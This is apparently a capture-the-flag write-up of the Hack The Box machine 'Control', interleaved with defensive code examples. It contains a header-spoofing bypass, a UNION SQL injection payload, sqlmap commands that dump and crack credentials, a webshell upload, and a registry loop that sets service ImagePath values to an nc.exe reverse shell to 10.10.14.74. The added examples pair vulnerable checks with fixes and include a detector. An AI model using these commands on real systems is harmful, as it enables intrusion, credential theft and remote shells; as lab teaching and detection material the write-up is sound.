Control

Control is a hard-difficulty Windows box that deals with Active Directory as well as registry misconfigurations.

Recon

We start off by scanning Control's IP 10.10.10.167 with nmap

nmap -T4 -A -v 10.10.10.167

From our scan we get the following results

PORT      STATE SERVICE VERSION
80/tcp    open  http    Microsoft IIS httpd 10.0
135/tcp   open  msrpc   Microsoft Windows RPC
3306/tcp  open  mysql?
49666/tcp open  msrpc   Microsoft Windows RPC
49667/tcp open  msrpc   Microsoft Windows RPC

We find that we have HTTP, MySQL and RPC running.

Doing a dirbust we find an admin.php page that we cannot access; it returns the error "Access Denied: Header Missing. Please ensure you go through the proxy to access this page". Going through the webpage's source code, however, we find a reference to a local IP on the machine

<!-- To Do: 
     — Import Products 
     — Link to new payment system 
     — Enable SSL (Certificates location \\192.168.4.28\myfiles) 
<!-- Header --> 

Armed with this information we know we need to supply a proxy-related header to get to the page.

Going through all the common proxy headers we find that X-Forwarded-For: 192.168.4.28 is our winning combination.

We can include this on our Burp requests to traverse the page.
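The gate on admin.php trusts a header the client writes, which is why adding X-Forwarded-For gets us through. The following is an added example (not the box's admin.php) of that check next to the form it should take: decide on the TCP peer address, and honour X-Forwarded-For only when the peer is a proxy you operate. The Request model is a stand-in for whatever the web server provides; 192.168.4.28 is the proxy address from the page's HTML comment, 10.10.14.74 is the attacking host from the writeup, and 10.0.0.5 / 203.0.113.9 are constructed client addresses.

```python
"""
Admin gate keyed on X-Forwarded-For: the way the box behaves beside the hardened form.
Added example, not code from the box or the writeup. Request is a constructed stand-in
for a web framework's request object.
"""
from dataclasses import dataclass, field

INTERNAL_PROXY = "192.168.4.28"              # proxy address quoted in the page's HTML comment
TRUSTED_PROXIES = frozenset({INTERNAL_PROXY})


@dataclass
class Request:
    remote_addr: str                          # TCP peer address the server itself observed
    headers: dict = field(default_factory=dict)

    def header(self, name: str, default=None):
        """Header names are case-insensitive, so look the value up that way."""
        for k, v in self.headers.items():
            if k.lower() == name.lower():
                return v
        return default


def admin_allowed_vulnerable(req: Request) -> bool:
    """What the page observed: the gate trusts a header the client controls, so any
    client sending 'X-Forwarded-For: 192.168.4.28' is treated as the internal proxy."""
    return req.header("X-Forwarded-For", req.remote_addr) == INTERNAL_PROXY


def admin_allowed_hardened(req: Request) -> bool:
    """Gate on the TCP peer address, which the client cannot set. Network position is
    still not authentication; the admin page should additionally require a login."""
    return req.remote_addr in TRUSTED_PROXIES


def effective_client_ip(req: Request) -> str:
    """The legitimate use of X-Forwarded-For: recover the real client for logging and
    rate limiting, but only when the peer is one of our proxies. The header reads
    'client, proxy1, proxy2, ...' and the rightmost entry was appended by the last
    hop, so walk from the right past our own proxies to the first foreign address."""
    if req.remote_addr not in TRUSTED_PROXIES:
        return req.remote_addr               # direct connection: the header is unverified input
    hops = [h.strip() for h in req.header("X-Forwarded-For", "").split(",") if h.strip()]
    for hop in reversed(hops):
        if hop not in TRUSTED_PROXIES:
            return hop
    return req.remote_addr                   # header absent or lists only our own proxies
```

With the vulnerable check, a direct connection from 10.10.14.74 carrying the header is let in, while a genuine request relayed by the proxy (whose header names the real client) is refused; the hardened check inverts both outcomes. On IIS the peer-address rule can also be enforced with the IP and Domain Restrictions feature rather than in PHP.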

After a little searching around we see that the website does basic CRUD operations and also offers a product search. After trying basic SQLi on all fields we find that the search field is vulnerable.

Doing a basic union select 1, database(), user(),1,1,1-- -

Gives us an output

Great! We now have the DB name, warehouse, and a user, manager
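The search field splices the term straight into the SQL text, which is why a quote followed by a UNION of the right width returns server information instead of products. The following is an added example, not the box's PHP: an in-memory SQLite table with a constructed six-column products schema (the page's UNION has six columns), the string-built query beside its parameterized form, and a payload of the same shape as the one above. SQLite has no database() or user() functions, so sqlite_version() stands in for the leaked server information.

```python
"""
Search-field SQL injection: query built by string concatenation beside the
parameterized fix. Added example, not the box's code; the products table,
its columns and rows are constructed.
"""
import sqlite3

COLUMNS = ("id", "name", "quantity", "price", "category", "supplier")
SELECT = f"SELECT {', '.join(COLUMNS)} FROM products WHERE name LIKE "

# Same shape as the page's payload: close the string literal, append a UNION of
# the same width, and comment out whatever the original query had after it.
UNION_PAYLOAD = "zzz' UNION SELECT 1, sqlite_version(), 'engine-user', 1, 1, 1-- -"


def make_db() -> sqlite3.Connection:
    """Constructed product table standing in for the box's warehouse database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (id INTEGER, name TEXT, quantity INTEGER, "
                 "price REAL, category TEXT, supplier TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?, ?, ?, ?, ?)", [
        (1, "Margherita", 40, 7.5, "pizza", "Acme Foods"),
        (2, "Pepperoni", 25, 8.5, "pizza", "Acme Foods"),
        (3, "Garlic bread", 60, 3.0, "side", "Bakery Co"),
    ])
    return conn


def search_vulnerable(conn: sqlite3.Connection, term: str) -> list:
    """User input is spliced into the SQL text; a quote in the term ends the literal
    and everything after it is parsed as SQL. This is the defect, kept on purpose."""
    return conn.execute(f"{SELECT}'%{term}%'").fetchall()


def search_parameterized(conn: sqlite3.Connection, term: str) -> list:
    """The term travels as a bound value; the engine never parses it as SQL, so the
    payload is only an unusual string that matches no product name."""
    return conn.execute(f"{SELECT}?", (f"%{term}%",)).fetchall()


def leaks_engine_info(rows: list) -> bool:
    """True when a result row is the UNION's row rather than a product."""
    return any(row[1] == sqlite3.sqlite_version for row in rows)


def demo() -> dict:
    """Run both forms against the payload and a normal term."""
    conn = make_db()
    return {
        "vulnerable_leaks": leaks_engine_info(search_vulnerable(conn, UNION_PAYLOAD)),
        "parameterized_leaks": leaks_engine_info(search_parameterized(conn, UNION_PAYLOAD)),
        "normal_search": [row[1] for row in search_parameterized(conn, "pepp")],
    }


if __name__ == "__main__":
    print(demo())
```

The parameterized query is the fix for the injection itself. The page goes on to show that the same database user also holds the FILE privilege, which is what turns a read-only injection into a file write; running the application as an account without FILE, with secure_file_priv set, contains the damage even when an injection slips through.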

With this we can go ahead and launch SQLMap

sqlmap -u 10.10.10.167/admin.php -H "X-Forwarded-For: 192.168.4.28" --all
database management system users password hashes:
[*] hector [1]:
    password hash: *0E178792E8FC304A2E3133D535D38CAF1DA3CD9D
[*] manager [1]:
    password hash: *CFE3EEE434B38CBF709AD67A4DCDEA476CBA7FDA
    clear-text password: l3tm3!n
[*] root [1]:
    password hash: *0A4A5CAD344718DC418035A1F4D292BA603134D8

From this we're able to pull some user hashes; cracking them we get

hector:l33th4x0rhector
manager:l3tm3!n

Jumping deeper with SQLMap

sqlmap -u http://control.htb/search_products.php --data="productName=*" --headers="X-Forwarded-For:192.168.4.28" --dbms=MySQL --technique=U --privileges
'manager'@'localhost' [1]:
    privilege: FILE

We find that we can use SQLMap to write files. For this we'll once again rely on a webshell we've used multiple times before: https://github.com/WhiteWinterWolf/wwwolf-php-webshell

sqlmap -u 10.10.10.167/search_products.php -H "X-Forwarded-For: 192.168.4.28" --forms --crawl=2 --file-write=/root/HTB/Control/wwwolf-php-webshell/webshell.php --file-dest=C:/inetpub/wwwroot/pizza.php --batch

Great, now that we have a webshell we can work on getting a full shell.

Exploit

After running ipconfig we see that WinRM is listening locally. Luckily we can port forward it to our machine; to do this we'll use plink, so we upload plink and make sure SSH is running on our system, after which we can run

.\plink.exe -l pizza -pw pizza -R 5985:127.0.0.1:5985 10.10.14.74

And

evil-winrm -i 127.0.0.1 -u hector -p 'l33th4x0rhector' -s ./ -e ./

And with that we have user!

Post Exploitation

Searching around the machine we don't find any obvious paths to priv esc; however, running

Get-PSReadlineOption

C:\Users\Hector\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

Gives us the PowerShell console history location, and reading it gives us

get-childitem HKLM:\SYSTEM\CurrentControlset | format-list
get-acl HKLM:\SYSTEM\CurrentControlSet | format-list

Not immediately obvious, but from this we can see that privilege escalation via the registry is the way: https://attack.mitre.org/techniques/T1058/

From here we can put together a list of all services in the registry, like

.NET CLR Data
.NET CLR Networking
.NET CLR Networking 4.0.0.0
.NET Data Provider for Oracle
.NET Data Provider for SqlServer
.NET Memory Cache 4.0
.NETFramework
1394ohci
3ware
ACPI
AcpiDev
acpiex
acpipagr
AcpiPmi
acpitime
ADOVMPPackage
ADP80XX
adsi
ADWS
AFD
afunix
ahcache
AJRouter
ALG
AmdK8
AmdPPM
amdsata
amdsbs
amdxata
AppHostSvc
AppID
AppIDSvc
Appinfo
applockerfltr
AppMgmt
AppReadiness
AppVClient
AppvStrm
AppvVemgr
AppvVfs
AppXSvc
arcsas
AsyncMac
atapi
AudioEndpointBuilder
Audiosrv
AxInstSV
b06bdrv
bam
BasicDisplay
BasicRender
BattC
bcmfn2
Beep
bfadfcoei
bfadi
BFE
bindflt
BITS
bowser
BrokerInfrastructure
BTAGService
BthAvctpSvc
BthEnum
BthLEEnum
BthMini
BTHPORT
bthserv
BTHUSB
bttflt
buttonconverter
bxfcoe
bxois
camsvc
CapImg
CaptureService
CaptureService_4248c
CaptureService_4b5c3
CaptureService_80d08
CaptureService_ee306
cbdhsvc
cbdhsvc_4248c
cbdhsvc_4b5c3
cbdhsvc_80d08
cbdhsvc_ee306
cdfs
CDPSvc
CDPUserSvc
CDPUserSvc_4248c
CDPUserSvc_4b5c3
CDPUserSvc_80d08
CDPUserSvc_ee306
cdrom
CertPropSvc
cht4iscsi
cht4vbd
CldFlt
CLFS
ClipSVC
clr_optimization_v4.0.30319_32
clr_optimization_v4.0.30319_64
CmBatt
CNG
cnghwassist
coherence
CompositeBus
COMSysApp
condrv
ConsentUxUserSvc
ConsentUxUserSvc_4248c
ConsentUxUserSvc_4b5c3
ConsentUxUserSvc_80d08
ConsentUxUserSvc_ee306
CoreMessagingRegistrar
CoreUI
crypt32
CryptSvc
CSC
CscService
dam
DCLocator
DcomLaunch
defragsvc
DeviceAssociationService
DeviceInstall
DevicePickerUserSvc
DevicePickerUserSvc_4248c
DevicePickerUserSvc_4b5c3
DevicePickerUserSvc_80d08
DevicePickerUserSvc_ee306
DevicesFlowUserSvc
DevicesFlowUserSvc_4248c
DevicesFlowUserSvc_4b5c3
DevicesFlowUserSvc_80d08
DevicesFlowUserSvc_ee306
DevQueryBroker
Dfs
Dfsc
DFSR
Dhcp
diagnosticshub.standardcollector.service
DiagTrack
Disk
DmEnrollmentSvc
dmvsc
dmwappushservice
DNS
Dnscache
DoSvc
dot3svc
DPS
drmkaud
DsmSvc
DsSvc
DXGKrnl
e1iexpress
Eaphost
ebdrv
EFS
EhStorClass
EhStorTcgDrv
elxfcoe
elxstor
embeddedmode
EntAppSvc
ErrDev
ESENT
EventLog
EventSystem
exfat
fastfat
fcvsc
fdc
fdPHost
FDResPub
FileCrypt
FileInfo
Filetrace
flpydisk
FltMgr
FontCache
FrameServer
FsDepends
Fs_Rec
gencounter
genericusbfn
GPIOClx0101
gpsvc
GraphicsPerfSvc
HdAudAddService
HDAudBus
HidBatt
hidinterrupt
hidserv
HidUsb
HomeGroupListener
HpSAMD
HTTP
hvcrash
HvHost
hvservice
HwNClx0101
hwpolicy
hyperkbd
HyperVideo
i8042prt
iaLPSSi_GPIO
iaLPSSi_I2C
iaStorAVC
iaStorV
ibbus
icssvc
IKEEXT
IndirectKmd
inetaccs
InetInfo
InstallService
intelide
intelpep
intelppm
iorate
IpFilterDriver
iphlpsvc
IPMIDRV
IPNAT
IPsecGW
IPT
isapnp
iScsiPrt
ItSas35i
kbdclass
kbdhid
kdnic
KeyIso
KPSSVC
KSecDD
KSecPkg
ksthunk
KtmRm
LanmanServer
LanmanWorkstation
ldap
lfsvc
LicenseManager
lltdio
lltdsvc
lmhosts
Lsa
LSI_SAS
LSI_SAS2i
LSI_SAS3i
LSI_SSS
LSM
luafv
MapsBroker
MariaDB
mausbhost
mausbip
megasas
megasas2i
megasas35i
megasr
Microsoft_Bluetooth_AvrcpTransport
mlx4_bus
MMCSS
Modem
monitor
mouclass
mouhid
mountmgr
mpsdrv
mpssvc
mrxsmb
mrxsmb20
MsBridge
MSDTC
MSDTC Bridge 4.0.0.0
Msfs
msgpiowin32
mshidkmdf
mshidumdf
msisadrv
MSiSCSI
msiserver
MSKSSRV
MsLbfoProvider
MsLldp
MSPCLOCK
MSPQM
MsRPC
MSSCNTRS
MsSecFlt
mssmbios
MSTEE
MTConfig
Mup
mvumis
napagent
NcaSvc
NcbService
ndfltr
NDIS
NdisCap
NdisImPlatform
NdisTapi
Ndisuio
NdisVirtualBus
NdisWan
ndiswanlegacy
ndproxy
NetAdapterCx
NetBIOS
NetbiosSmb
NetBT
Netlogon
Netman
netprofm
NetSetupSvc
NetTcpPortSharing
netvsc
netvscvfpp
NgcCtnrSvc
NgcSvc
NlaSvc
Npfs
npsvctrig
nsi
nsiproxy
Ntfs
Null
nvdimm
nvraid
nvstor
Parport
partmgr
PcaSvc
pci
pciide
pcmcia
pcw
pdc
PEAUTH
percsas2i
percsas3i
PerfDisk
PerfHost
PerfNet
PerfOS
PerfProc
PhoneSvc
PimIndexMaintenanceSvc
PimIndexMaintenanceSvc_4248c
PimIndexMaintenanceSvc_4b5c3
PimIndexMaintenanceSvc_80d08
PimIndexMaintenanceSvc_ee306
PktMon
pla
PlugPlay
pmem
PNPMEM
PolicyAgent
PortProxy
Power
PptpMiniport
PrintNotify
PrintWorkflowUserSvc
PrintWorkflowUserSvc_4248c
PrintWorkflowUserSvc_4b5c3
PrintWorkflowUserSvc_80d08
PrintWorkflowUserSvc_ee306
Processor
ProfSvc
Psched
PushToInstall
pvscsi
qebdrv
qefcoe
qeois
ql2300i
ql40xx2i
qlfcoei
QWAVE
QWAVEdrv
Ramdisk
RasAcd
RasAgileVpn
RasAuto
RasGre
Rasl2tp
RasMan
RasPppoe
RasSstp
rdbss
RDMANDK
rdpbus
RDPDR
RDPNP
RDPUDD
RdpVideoMiniport
ReFS
ReFSv1
RemoteAccess
RemoteRegistry
RFCOMM
rhelfltr
rhelnet
rhelscsi
rhproxy
RmSvc
RpcEptMapper
RpcLocator
RpcSs
RSoPProv
rspndr
s3cap
sacdrv
sacsvr
SamSs
sbp2port
SCardSvr
ScDeviceEnum
scfilter
Schedule
scmbus
SCPolicySvc
sdbus
SDFRd
sdstor
seclogon
SecurityHealthService
SEMgrSvc
SENS
Sense
SensorDataService
SensorService
SensrSvc
SerCx
SerCx2
Serenum
Serial
sermouse
SessionEnv
sfloppy
SgrmAgent
SgrmBroker
SharedAccess
ShellHWDetection
shpamsvc
SiSRaid2
SiSRaid4
SmartPqi
SmartSAMD
smbdirect
smphost
SMSvcHost 4.0.0.0
SNMP
SNMPTRAP
spaceport
SpbCx
Spooler
sppsvc
srv2
srvnet
SSDPSRV
ssh-agent
SstpSvc
StateRepository
stexstor
stisvc
storahci
storflt
stornvme
storqosflt
StorSvc
storufs
storvsc
svsvc
swenum
swprv
Synth3dVsc
SysMain
SystemEventsBroker
TabletInputService
tapisrv
Tcpip
Tcpip6
TCPIP6TUNNEL
tcpipreg
TCPIPTUNNEL
tdx
terminpt
TermService
Themes
TieringEngineService
TimeBrokerSvc
TokenBroker
toolsrv
TPM
TrkWks
TrustedInstaller
TSDDD
TsUsbFlt
TsUsbGD
tsusbhub
tunnel
tzautoupdate
UALSVC
UASPStor
UcmCx0101
UcmTcpciCx0101
UcmUcsi
UcmUcsiAcpiClient
UcmUcsiCx0101
Ucx01000
UdeCx
udfs
UEFI
UevAgentDriver
UevAgentService
Ufx01000
UfxChipidea
ufxsynopsys
UGatherer
UGTHRSVC
umbus
UmPass
UmRdpService
UnistoreSvc
UnistoreSvc_4248c
UnistoreSvc_4b5c3
UnistoreSvc_80d08
UnistoreSvc_ee306
upnphost
UrsChipidea
UrsCx01000
UrsSynopsys
usbccgp
usbehci
usbhub
USBHUB3
usbohci
usbprint
usbser
USBSTOR
usbuhci
usbvideo
USBXHCI
UserDataSvc
UserDataSvc_4248c
UserDataSvc_4b5c3
UserDataSvc_80d08
UserDataSvc_ee306
UserManager
UsoSvc
VaultSvc
vdrvroot
vds
VerifierExt
VGAuthService
vhdmp
vhf
vm3dmp
vm3dmp-debug
vm3dmp-stats
vm3dmp_loader
vmbus
VMBusHID
vmci
vmgid
vmhgfs
vmicguestinterface
vmicheartbeat
vmickvpexchange
vmicrdv
vmicshutdown
vmictimesync
vmicvmsession
vmicvss
VMMemCtl
vmmouse
vmrawdsk
VMTools
vmusbmouse
vmvss
vmwefifw
vmxnet3ndis6
volmgr
volmgrx
volsnap
volume
vpci
VPCMap
vsmraid
vsock
VSS
VSTXRAID
vwifibus
W32Time
w3logsvc
W3SVC
WaaSMedicSvc
WacomPen
WalletService
wanarp
wanarpv6
WarpJITSvc
WAS
WbioSrvc
wcifs
Wcmsvc
wcnfs
WdBoot
Wdf01000
WdFilter
WdiServiceHost
WdiSystemHost
WdmCompanionFilter
WdNisDrv
WdNisSvc
Wecsvc
WEPHOSTSVC
wercplsupport
WerSvc
WFPLWFS
WiaRpc
WIMMount
WinDefend
Windows Workflow Foundation 4.0.0.0
WindowsTrustedRT
WindowsTrustedRTProxy
WinHttpAutoProxySvc
WinMad
Winmgmt
WinNat
WinQuic
WinRM
Winsock
WinSock2
WINUSB
WinVerbs
wisvc
WlanSvc
wlidsvc
WmiAcpi
WmiApRpl
wmiApSrv
WMPNetworkSvc
Wof
workerdd
WPDBusEnum
WpdUpFltr
WpnService
WpnUserService
WpnUserService_4248c
WpnUserService_4b5c3
WpnUserService_80d08
WpnUserService_ee306
ws2ifsl
WSearch
WSearchIdxPi
wuauserv
WudfPf
WUDFRd
xmlprov
{60E8E863-2974-47D1-89E0-E507677AA14F}
{6D197A8D-04EB-44C6-B602-FF2798EB7BB3}
{CB20B026-8E3E-4F7D-88FD-E7FB0E93CF39}

And prepare a little script that goes through this list and finds our vulnerable service

foreach($s in Get-Content .\service.txt) { Set-ItemProperty -path "HKLM:\SYSTEM\CurrentControlSet\Services\$s\" -Name ImagePath -Value "cmd /k C:/Windows/Temp/nc.exe 10.10.14.74 6464 -e powershell.exe"; Start-Service "$s" }

And voila we have root!
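The loop above works because Hector can write the ImagePath value of at least one service key, and it leaves a very recognisable trail: one process rewriting service after service with a binary that lives nowhere a service binary should. The following is an added example, not from the writeup, of detection logic over Sysmon Event ID 13 (RegistryEvent, value set) records as a SIEM would forward them in JSON lines. The log records, the process ids, the CONTROL\Hector account and the six service names are constructed (the names are taken from the list above); the registry path pattern and the Sysmon field names are real.

```python
"""
Detecting service ImagePath tampering (the page's MITRE T1058 reference) over
Sysmon Event ID 13 records. Added example, not from the writeup; every log line,
process id and account name below is constructed.
"""
import json
import re
from collections import defaultdict
from datetime import datetime, timedelta

IMAGEPATH_KEY = re.compile(
    r"^HKLM\\System\\CurrentControlSet\\Services\\([^\\]+)\\ImagePath$", re.IGNORECASE)
EXPECTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
                 "c:\\program files\\", "c:\\program files (x86)\\")
SUSPICIOUS_TOKENS = ("cmd ", "cmd.exe", "powershell", "\\temp\\", "\\users\\", "\\programdata\\")


def normalize_image_path(value: str) -> str:
    """Expand the forms Windows stores service binaries in (%SystemRoot%, \\SystemRoot\\,
    \\??\\, bare system32\\ for drivers, quotes, forward slashes) before judging the path."""
    v = value.strip().lstrip('"').lower().replace("/", "\\")
    for prefix in ("\\??\\", "\\\\?\\"):
        if v.startswith(prefix):
            v = v[len(prefix):]
    v = v.replace("%systemroot%\\", "c:\\windows\\").replace("\\systemroot\\", "c:\\windows\\")
    return "c:\\windows\\" + v if v.startswith("system32\\") else v


def judge_image_path(value: str) -> list:
    """Reasons the new ImagePath looks wrong; an empty list means it looks like a normal service."""
    v = normalize_image_path(value)
    reasons = []
    if not any(v.startswith(d) for d in EXPECTED_DIRS):
        reasons.append("binary outside expected directories")
    reasons += [f"contains '{tok}'" for tok in SUSPICIOUS_TOKENS if tok in v]
    return reasons


def find_imagepath_changes(log_text: str) -> list:
    """Parse newline-delimited JSON records and keep the Event ID 13 writes to an ImagePath."""
    findings = []
    for line in filter(None, map(str.strip, log_text.splitlines())):
        r = json.loads(line)
        m = IMAGEPATH_KEY.match(r.get("TargetObject", "")) if r.get("EventID") == 13 else None
        if m:
            findings.append({"time": datetime.strptime(r["UtcTime"], "%Y-%m-%d %H:%M:%S.%f"),
                             "service": m.group(1), "image": r.get("Image", ""),
                             "pid": r.get("ProcessId"), "user": r.get("User", ""),
                             "value": r.get("Details", ""), "reasons": judge_image_path(r.get("Details", ""))})
    return findings


def find_bursts(findings: list, window=timedelta(seconds=60), threshold=5) -> list:
    """One process rewriting many services' ImagePath inside a short window is the loop's
    signature even when each value on its own looked plausible. Returns (image, pid, count)."""
    by_proc = defaultdict(list)
    for f in findings:
        by_proc[(f["image"], f["pid"])].append(f)
    bursts = []
    for (image, pid), fs in by_proc.items():
        fs.sort(key=lambda f: f["time"])
        best = max(len({g["service"] for g in fs[i:] if g["time"] - f["time"] <= window})
                   for i, f in enumerate(fs))
        if best >= threshold:
            bursts.append((image, pid, best))
    return bursts


def _rec(time, image, pid, user, target, details):
    return json.dumps({"EventID": 13, "UtcTime": time, "EventType": "SetValue", "Image": image,
                       "ProcessId": pid, "User": user, "TargetObject": target, "Details": details})


SVC = "HKLM\\System\\CurrentControlSet\\Services\\"
PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
PAYLOAD = "cmd /k C:/Windows/Temp/nc.exe 10.10.14.74 6464 -e powershell.exe"   # the value the loop above writes
SAMPLE_LOG = "\n".join([  # constructed records: two legitimate writes, one non-ImagePath write, then the loop
    _rec("2020-01-10 09:14:01.100", "C:\\Windows\\System32\\msiexec.exe", 1204, "NT AUTHORITY\\SYSTEM",
         SVC + "VMTools\\ImagePath", "\"C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\""),
    _rec("2020-01-10 09:14:02.000", "C:\\Windows\\System32\\services.exe", 668, "NT AUTHORITY\\SYSTEM",
         SVC + "AFD\\ImagePath", "\\SystemRoot\\system32\\drivers\\afd.sys"),
    _rec("2020-01-10 09:14:03.000", "C:\\Windows\\System32\\services.exe", 668, "NT AUTHORITY\\SYSTEM",
         SVC + "wuauserv\\Start", "DWORD (0x00000002)"),
] + [_rec(f"2020-01-10 09:20:{i:02d}.500", PS, 5120, "CONTROL\\Hector", SVC + svc + "\\ImagePath", PAYLOAD)
     for i, svc in enumerate(["ADWS", "AJRouter", "ALG", "AppMgmt", "seclogon", "wuauserv"])])


def run(log_text: str = SAMPLE_LOG) -> dict:
    findings = find_imagepath_changes(log_text)
    return {"suspicious": [f for f in findings if f["reasons"]],
            "benign": [f for f in findings if not f["reasons"]],
            "bursts": find_bursts(findings)}


if __name__ == "__main__":
    result = run()
    for f in result["suspicious"]:
        print(f"{f['time']} {f['user']} {f['image']} -> {f['service']}: {f['value']!r} ({'; '.join(f['reasons'])})")
    for image, pid, n in result["bursts"]:
        print(f"BURST: {image} (pid {pid}) rewrote the ImagePath of {n} services within 60s")
```

Collecting these events requires a Sysmon rule that includes HKLM\System\CurrentControlSet\Services\*\ImagePath, or the equivalent SACL plus Windows event 4657. The detection is the second line of defence; the actual fix is the one the page's own Get-Acl command points at: no service key under HKLM\SYSTEM\CurrentControlSet\Services should grant write access to ordinary users, and a periodic ACL audit of those keys finds the weak one before a loop like the above does.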

https://github.com/redcanaryco/atomic-red-team
